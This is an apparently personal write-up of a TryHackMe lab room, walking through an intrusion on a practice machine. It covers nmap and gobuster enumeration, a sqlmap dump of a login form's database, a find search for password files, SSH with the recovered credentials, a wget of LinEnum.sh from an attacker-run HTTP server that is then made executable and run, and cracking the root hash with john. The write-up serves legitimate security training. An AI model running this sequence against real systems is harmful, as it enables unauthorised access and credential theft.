In this room you are tasked to get Pingu's fish back. The first thing I do is start the machine.
I see that the website shows the default web page for an Apache install.
Next I want to do enumeration of the machine. In order to do that I will use the nmap command and the specific command we want is nmap -sC -sV -oA nmap/server 10.10.11.70. Let's break that command down a little bit: -sC runs default scripts on the port, -sV enumerates the version of the software, -oA outputs all formats to a location and then the ip address of the machine.
For the questions you can reference your scan and then you should be able to answer:
The next step of this process is to fuzz the website to find alternate pages on the server. This will be done using gobuster. Gobuster is a program that will brute force a websites different pages from a word list that you will provide to the program. The command that I will use here is: gobuster --url http://10.10.11.70 -w ~/CTF/words/directories/big.txt -x php,html,txt | tee gobuster.txt. Like before I will break down the command. --url directs the program to look at a specific website address, -w that switch tells the program to use a specific wordlist, -x tells the program to search for specific extensions (in this case php, txt and html). I like to pipe the output using tee to get a text file that I can reference later.
Now that I have that step done, I will navigate to the page that was found. On that page I am greeted with a username and password field. There are multiple ways of tackling this problem, I could use hydra to brute force the username and password but the command that I am going to use is sqlmap. Sqlmap is a program that can help us dump the database behind the login form. The specific command that we are going to run is: sqlmap -u http://10.10.11.70/administrator.php --forms --dump-all. I will then accept the defaults on the questions. This step will take a little while so be patient as it is executing.
Once the command has completed I will go onto the next step and use the credentials that we found through the database dump to login to the administrator page. When I log on I am greeted with a prompt that says Run command.
I try to run the ls command to see what happens and guess what, I get a listing of the current directory. One of the questions is asking about an ssh password and it doesn't give a hint where it is. I guess that I am going to have to find it in the system. In order to find files on the system I will use the find command. I am going to take a stab at it and use the following command and see what it returns. find / -name pass 2>/dev/null and see what I can find that has the name pass.
Next I will use the cat command to display the contents of the file. When the contents of the file are displayed I will use the credentials to ssh onto the box. After a few attempts I am now on the box via ssh.
The next step is to privileged escalate an the script that will be used is called LinEnum.sh. The file needs to be put onto the target box and to do that I am going to open another terminal window and cd to the directory where the script is located. For me it is in my Tools directory, ~/CTF/Tools. Once I am in that directory I am going to use the following python command to setup an HTTP server in that directory. python3 -m http.server
On the target box I will try to use the wget command to see if the file can be transferred over. The specific command is wget http://<IP ADDR>:8000/LinEnum.sh. When I get the file onto the box I will move it to the /tmp folder and then add the executable flag on the file by using chmod +x LinEnum.sh The next step is to execute the shells script and see what the output is. I know what I am looking for according to the question that was given, so all I have to do is search through the output looking for a file with suid set.
The next few steps are about binary exploitation and if I am honest I am not the best at this and will just follow the instructions that are given. Using the pwntools exploitation I noticed that the root user's hashed password is there.
In order to get the plain text password I need to crack that hash. In order to do that I will use john since I am working on a VM and I don't want to use hashcat since hashcat wants to use the graphics card. The command that you want to use is john root.hash --wordlist=~/CTF/words/pass.txt
Once I got that root password the room is complete. This was a learning experience for me because of the binary exploitation. I need to stick some time into learning more about that. I hope that you will come back as I will be working on more of these rooms and putting my writeups here.
If there is something that you would like to see on Tryhackme or if there are suggestions please email me at mark@markschindel.com.